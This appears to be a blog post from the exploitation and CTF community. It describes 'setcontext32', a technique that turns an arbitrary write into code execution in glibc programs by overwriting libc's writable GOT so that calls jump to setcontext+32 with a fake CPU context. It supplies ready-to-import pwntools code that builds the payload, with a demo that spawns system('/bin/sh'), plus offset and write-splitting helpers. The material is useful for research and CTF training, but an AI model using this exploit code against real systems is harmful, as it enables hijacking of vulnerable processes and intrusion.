Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of __free_hook are long gone; now you've got to leak the pointer mangling cookie to modify an existing __exit_funcs entry, maybe compute the offset to ld.so to overwrite l_addr and create a fake DT_FINI entry, or perhaps set up special _codecvt and _wide_data structures on hijacked IO objects… I'd just like to specify the function I want to call and its arguments!
I want a flexible RCE primitive. I don't want to rely on _IO_cleanup, _dl_fini, or malloc to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called even with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray that the stack is aligned for system. I don't want to satisfy several constraints just so one_gadget will work!
setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like:
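write(libc_write_address, flat(
    p64(0),
    p64(libc_write_address + 0x218),  # fake link_map pointer: address of the ucontext below
    p64(setcontext+32),               # fake runtime resolver
    p64(libc_exe_address) * 0x40,     # every GOT entry now points at the PLT trampoline
    cpu_state_information,            # lands at libc_write_address + 0x218
))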
Where libc_write_address is the start of the writeable page in libc, libc_exe_address is the start of the executable page in libc, and cpu_state_information is a structure that contains all current registers, including rsp and rip.
Every GOT entry in libc, such as memset, memcpy, strcpy, and strlen, is replaced with the address of the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes a fake link_map pointer, libc_write_address + 0x218, and jumps to a fake runtime resolver, setcontext+32. Both values are read from the start of the writeable page, which the payload now controls.
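The 0x218 offset falls out of the payload layout: three header qwords followed by 0x40 sprayed slots. The following is a minimal sketch of that arithmetic, not part of the original tooling; the names layout, QWORD and GOT_SLOTS and the base address are made up for illustration.

```python
QWORD = 8
GOT_SLOTS = 0x40  # number of slots sprayed in the payload above


def layout(libc_write_address: int) -> dict:
    """Return the address of each region of the payload (illustrative helper)."""
    got0 = libc_write_address                   # first qword, written as 0
    link_map_slot = got0 + 1 * QWORD            # value pushed by the PLT trampoline
    resolver_slot = got0 + 2 * QWORD            # value the PLT trampoline jumps to
    first_entry = got0 + 3 * QWORD              # first sprayed function slot
    ucontext = first_entry + GOT_SLOTS * QWORD  # fake ucontext_t follows the slots
    return {
        "link_map_slot": link_map_slot,
        "resolver_slot": resolver_slot,
        "first_entry": first_entry,
        "ucontext": ucontext,
    }


base = 0x7FFFF7E19000  # hypothetical address, for illustration only
regions = layout(base)
print({name: hex(addr - base) for name, addr in regions.items()})
```

The ucontext region starts 0x18 + 0x40 * 8 = 0x218 bytes past the start of the write, which is why the fake link_map pointer is libc_write_address + 0x218.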
setcontext+32 pops libc_write_address + 0x218 off the stack, and treats it as a pointer to a saved ucontext_t. It'll then load your structure as the current CPU state.
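The register offsets used by create_ucontext in setcontext32.py can be cross-checked against the ucontext_t layout. The sketch below assumes the x86-64 glibc definitions (gregs ordered as in the REG_* enum of sys/ucontext.h, a 128-byte sigset_t, and mxcsr 24 bytes into the FP state); other architectures or libcs would need different numbers. The helper names are made up for illustration.

```python
# Order of gregs[] on x86-64 glibc (REG_R8 ... REG_CR2), assumed here.
GREG_ORDER = [
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "efl", "csgsfs", "err", "trapno", "oldmask", "cr2",
]

# uc_flags (8) + uc_link (8) + uc_stack (24) precede uc_mcontext.
GREGS_BASE = 8 + 8 + 24


def greg_offset(name: str) -> int:
    """Offset of a general-purpose register inside ucontext_t."""
    return GREGS_BASE + 8 * GREG_ORDER.index(name)


# mcontext_t = gregs[23] + fpregs pointer + 8 reserved qwords.
FPREGS_PTR = GREGS_BASE + 8 * len(GREG_ORDER)
MCONTEXT_SIZE = 8 * len(GREG_ORDER) + 8 + 8 * 8
SIGMASK = GREGS_BASE + MCONTEXT_SIZE
FPREGS_MEM = SIGMASK + 128  # the FP state follows the 128-byte uc_sigmask
MXCSR = FPREGS_MEM + 24     # mxcsr field inside the FP state

for reg in ("rdi", "rsi", "rdx", "rsp", "rip"):
    print(reg, hex(greg_offset(reg)))
print("fpregs ptr", hex(FPREGS_PTR), "mxcsr", hex(MXCSR))
```

Under those assumptions the results line up with the constants in create_ucontext: rsp at 0xA0, rip at 0xA8, the fldenv pointer at 0xE0, and the ldmxcsr operand at 0x1C0.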
Calling most libc functions will trigger setcontext32, including malloc, exit, and (almost?) every IO operation.
libc's GOT is writeable so that libc can use architecture-specific functions, such as a memcpy optimized for SSE or AVX512. A friend also guessed that it could be for ltrace. I learned the libc GOT was writeable from pwndbg creator disconnect3d.
Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below.
setcontext32.py
from pwn import *


def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    # Build the 0x200-byte fake ucontext_t that setcontext+32 will load.
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fldenv ptr
    b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr
    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)
    b[0xA8:0xB0] = p64(rip)  # ret ptr
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)
    return b


def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
    # Returns (address to write to, payload bytes).
    got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
    plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
    return got, flat(
        p64(0),
        p64(got + 0x218),  # fake link_map pointer: the ucontext below
        p64(libc.symbols["setcontext"] + 32),  # fake runtime resolver
        p64(plt_trampoline) * 0x40,  # point every GOT slot at the PLT trampoline
        create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
    )


if __name__ == "__main__":
    libc = ELF("./libc.so.6")
    # In a real exploit, set libc.address to the leaked libc base first.
    dest, payload = setcontext32(
        libc, rip=libc.sym["system"], rdi=next(libc.search(b"/bin/sh"))
    )
    print(hex(dest), payload.hex())
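Many write primitives only write one qword at a time rather than a whole buffer. As a rough sketch of how the (dest, payload) pair above could be fed to such a primitive, the helper below splits a payload into (address, value) pairs. Both qword_writes and the arb_write64 function mentioned in the comment are hypothetical names, not part of pwntools or of the code above.

```python
import struct


def qword_writes(dest: int, payload: bytes) -> list:
    """Split payload into (address, 64-bit value) pairs, little-endian."""
    # Zero-pad to a multiple of 8 bytes so every chunk is a full qword.
    padded = bytes(payload) + b"\x00" * (-len(payload) % 8)
    return [
        (dest + off, struct.unpack_from("<Q", padded, off)[0])
        for off in range(0, len(padded), 8)
    ]


# Hypothetical usage, assuming arb_write64(addr, value) is your primitive:
#   for addr, value in qword_writes(dest, payload):
#       arb_write64(addr, value)
demo = qword_writes(0x1000, bytes(range(16)))
print([(hex(a), hex(v)) for a, v in demo])
```

With a piecewise primitive, a libc call made between two writes may hit a half-written GOT, so a single large write is the simpler option when one is available.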